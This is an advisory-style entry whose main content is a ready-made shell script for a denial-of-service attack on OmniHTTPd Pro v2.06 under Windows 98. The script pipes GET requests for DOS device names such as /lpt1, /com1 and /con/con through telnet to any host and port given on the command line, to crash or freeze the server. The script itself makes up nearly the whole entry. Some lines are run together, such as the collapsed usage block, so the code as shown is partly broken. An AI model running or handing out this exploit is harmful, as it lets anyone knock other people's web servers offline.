COMMAND
Omni httpd
SYSTEMS AFFECTED
Omni Httpd pro v.2.06 Win98 (NT not tested)
PROBLEM
Here is the exploit code to crash/freeze OmniHttpD Pro v2.06,
in-depth information on this particular bug can be found in a
securax advisory.
#!/bin/sh
#
# Vulnerable versions:
# Omni Httpd pro v.2.06 Win98 (NT not tested)
#
# The problem:
# It is possible to crash remote system because OmniHttpD
(version: Pro. v2.06, maybe others) parse the
# path strings to call some FAT32/VFAT routines in the kernel which
makes your system unstable and useless until next reboot.
#
# Fix:
# Unknown for now, I mailed Omnicron Technologies ... they will
probably fix this bug
# in next version.
#
# About:
# Discovered by: sirius from b0f
# Coded by: sirius from buffer0vefl0w security (b0f)
# [http://b0f.freebsd.lublin.pl]
if [ "$1" = "" ]; then
echo "OmniHTTPd v.2.06 DoS attack"
echo
echo "Coded: sirius from buffer0vefl0w security (b0f)"
echo "[http://b0f.freebsd.lublin.pl]"
echo
echo "Usage: $0 <host> <port>" echo exit 1 fi
echo "Launching attack ... please wait "
# this will crash some devices, but if modem is on comX the code after
line with comX will not
# be executed ... you can change the order of execution ;)
(echo "GET /lpt1" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /lpt2" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com1" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com2" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com3" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com4" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com5" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
# the following code will crash/freeze/make system busy/how to call
it? system
(echo "GET /aux" ; sleep 5) | telnet $1 80 1>/dev/null 2>/dev/null
(echo "GET /con/con" ; sleep 5) |telnet $1 80 1>/dev/null 2>/dev/null
echo "Crash code send ..."
killall -9 telnet 2>/dev/null 1> /dev/null
echo "Done!"
SOLUTION
Should be fixed.